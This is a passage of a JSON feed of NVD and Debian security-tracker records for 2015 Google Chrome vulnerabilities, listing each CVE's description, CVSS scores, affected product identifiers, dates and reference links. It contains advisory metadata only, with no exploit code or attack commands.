browser/ui/views/location_bar/open_pdf_in_reader_view.cc in Google Chrome before 41.0.2272.76 might allow user-assisted remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact by triggering interaction with a PDFium \"Open PDF in Reader\" button that has an invalid tab association.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "cve", "title": "CVE-2015-1245", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1245"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "cpe:/a:google:chrome:41.0.2272.74"], "id": "CVE-2015-1245", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1245", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:41.0.2272.74:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:21", "description": "The SearchEngineTabHelper::OnPageHasOSDD function in browser/ui/search_engines/search_engine_tab_helper.cc in Google Chrome before 42.0.2311.90 does not prevent use of a file: URL for an OpenSearch descriptor XML document, which might allow remote attackers to obtain sensitive information from local files via a crafted (1) http or (2) https web site.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "cve", "title": "CVE-2015-1247", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1247"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/a:google:chrome:42.0.2311.60", "cpe:/o:debian:debian_linux:7.0"], "id": "CVE-2015-1247", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1247", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.60:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:23", "description": "The FileSystem API in Google Chrome before 40.0.2214.91 allows remote attackers to bypass the SafeBrowsing for Executable Files protection mechanism by creating a .exe file in a temporary filesystem and then referencing this file with a filesystem:http: URL.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "cve", "title": "CVE-2015-1248", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1248"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "cpe:/a:google:chrome:40.0.2214.85"], "id": "CVE-2015-1248", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1248", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:40.0.2214.85:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:14", "description": "gpu/blink/webgraphicscontext3d_impl.cc in the WebGL implementation in Google Chrome before 42.0.2311.90 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted WebGL program that triggers a state inconsistency.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "cve", "title": "CVE-2015-1240", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1240"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.60", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "CVE-2015-1240", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1240", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.60:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:20", "description": "Blink, as used in Google Chrome before 42.0.2311.90, allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "cve", "title": "CVE-2015-1246", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1246"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/a:google:chrome:42.0.2311.60", "cpe:/o:debian:debian_linux:7.0"], "id": "CVE-2015-1246", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1246", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.60:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:27", "description": "common/partial_circular_buffer.cc in Google Chrome before 43.0.2357.65 does not properly handle wraps, which allows remote attackers to bypass a sandbox protection mechanism or cause a denial of service (out-of-bounds write) via vectors that trigger a write operation with a large amount of data, related to the PartialCircularBuffer::Write and PartialCircularBuffer::DoWrite functions.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "cve", "title": "CVE-2015-1252", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1252"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.152"], "id": "CVE-2015-1252", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1252", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.152:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:04", "description": "Google Chrome before 41.0.2272.118 does not properly handle the interaction of IPC, the Gamepad API, and Google V8, which allows remote attackers to execute arbitrary code via unspecified vectors.", "cvss3": {}, "published": "2015-04-01T21:59:00", "type": "cve", "title": "CVE-2015-1233", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1233"], "modified": "2021-09-22T14:22:00", "cpe": ["cpe:/a:google:chrome:41.0.2272.102"], "id": "CVE-2015-1233", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1233", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:41.0.2272.102:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:07", "description": "Race condition in gpu/command_buffer/service/gles2_cmd_decoder.cc in Google Chrome before 41.0.2272.118 allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact by manipulating OpenGL ES commands.", "cvss3": {}, "published": "2015-04-01T21:59:00", "type": "cve", "title": "CVE-2015-1234", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1234"], "modified": "2021-09-22T14:22:00", "cpe": ["cpe:/a:google:chrome:41.0.2272.102"], "id": "CVE-2015-1234", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1234", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:41.0.2272.102:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:14", "description": "Google Chrome before 42.0.2311.90 does not properly consider the interaction of page navigation with the handling of touch events and gesture events, which allows remote attackers to trigger unintended UI actions via a crafted web site that conducts a \"tapjacking\" attack.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "cve", "title": "CVE-2015-1241", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1241"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.60", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "CVE-2015-1241", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1241", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.60:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:53:09", "description": "Use-after-free vulnerability in the RenderFrameImpl::OnMessageReceived function in content/renderer/render_frame_impl.cc in Google Chrome before 42.0.2311.90 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger renderer IPC messages during a detach operation.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "cve", "title": "CVE-2015-1237", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1237"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:google:chrome:42.0.2311.60", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "CVE-2015-1237", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1237", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:42.0.2311.60:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2021-12-14T17:47:14", "description": "PDFium, as used in Google Chrome before 43.0.2357.65, does not properly initialize memory, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1259", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1259"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1259", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1259", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Use-after-free vulnerability in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document that leverages improper handling of a shadow tree for a use element.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1256", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1256"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1256", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1265", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1265"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1265", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Use-after-free vulnerability in the MutationObserver::disconnect function in core/dom/MutationObserver.cpp in the DOM implementation in Blink, as used in Google Chrome before 42.0.2311.135, allows remote attackers to cause a denial of service or possibly have unspecified other impact by triggering an attempt to unregister a MutationObserver object that is not currently registered.", "cvss3": {}, "published": "2015-05-01T10:59:00", "type": "debiancve", "title": "CVE-2015-1243", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243"], "modified": "2015-05-01T10:59:00", "id": "DEBIANCVE:CVE-2015-1243", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1243", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Cross-site scripting (XSS) vulnerability in Google Chrome before 43.0.2357.65 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted data that is improperly handled by the Bookmarks feature.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1264", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1264"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1264", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1264", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-13T02:03:08", "description": "Google Chrome before 43.0.2357.65 relies on libvpx code that was not built with an appropriate --size-limit value, which allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1258", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1258", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1258", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "platform/fonts/shaping/HarfBuzzShaper.cpp in Blink, as used in Google Chrome before 43.0.2357.65, does not initialize a certain width field, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted Unicode text.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1262", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1262"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1262", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "core/dom/Document.cpp in Blink, as used in Google Chrome before 43.0.2357.65, enables the inheritance of the designMode attribute, which allows remote attackers to bypass the Same Origin Policy by leveraging the availability of editing.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1254", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1254"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1254", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1254", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:14", "description": "platform/graphics/filters/FEColorMatrix.cpp in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, does not properly handle an insufficient number of values in an feColorMatrix filter, which allows remote attackers to cause a denial of service (container overflow) or possibly have unspecified other impact via a crafted document.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1257", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1257"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1257", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1257", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Use-after-free vulnerability in content/renderer/media/webaudio_capturer_source.cc in the WebAudio implementation in Google Chrome before 43.0.2357.65 allows remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact by leveraging improper handling of a stop action for an audio track.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1255", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1255"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1255", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1255", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Multiple unspecified vulnerabilities in Google Chrome before 42.0.2311.135 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-01T10:59:00", "type": "debiancve", "title": "CVE-2015-1250", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1250"], "modified": "2015-05-01T10:59:00", "id": "DEBIANCVE:CVE-2015-1250", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1250", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "The URLRequest::GetHSTSRedirect function in url_request/url_request.cc in Google Chrome before 42.0.2311.90 does not replace the ws scheme with the wss scheme whenever an HSTS Policy is active, which makes it easier for remote attackers to obtain sensitive information by sniffing the network for WebSocket traffic.", "cvss3": {}, "published": "2015-04-19T10:59:00", "type": "debiancve", "title": "CVE-2015-1244", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1244"], "modified": "2015-04-19T10:59:00", "id": "DEBIANCVE:CVE-2015-1244", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1244", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Use-after-free vulnerability in the SpeechRecognitionClient implementation in the Speech subsystem in Google Chrome before 43.0.2357.65 allows remote attackers to execute arbitrary code via a crafted document.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1251", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 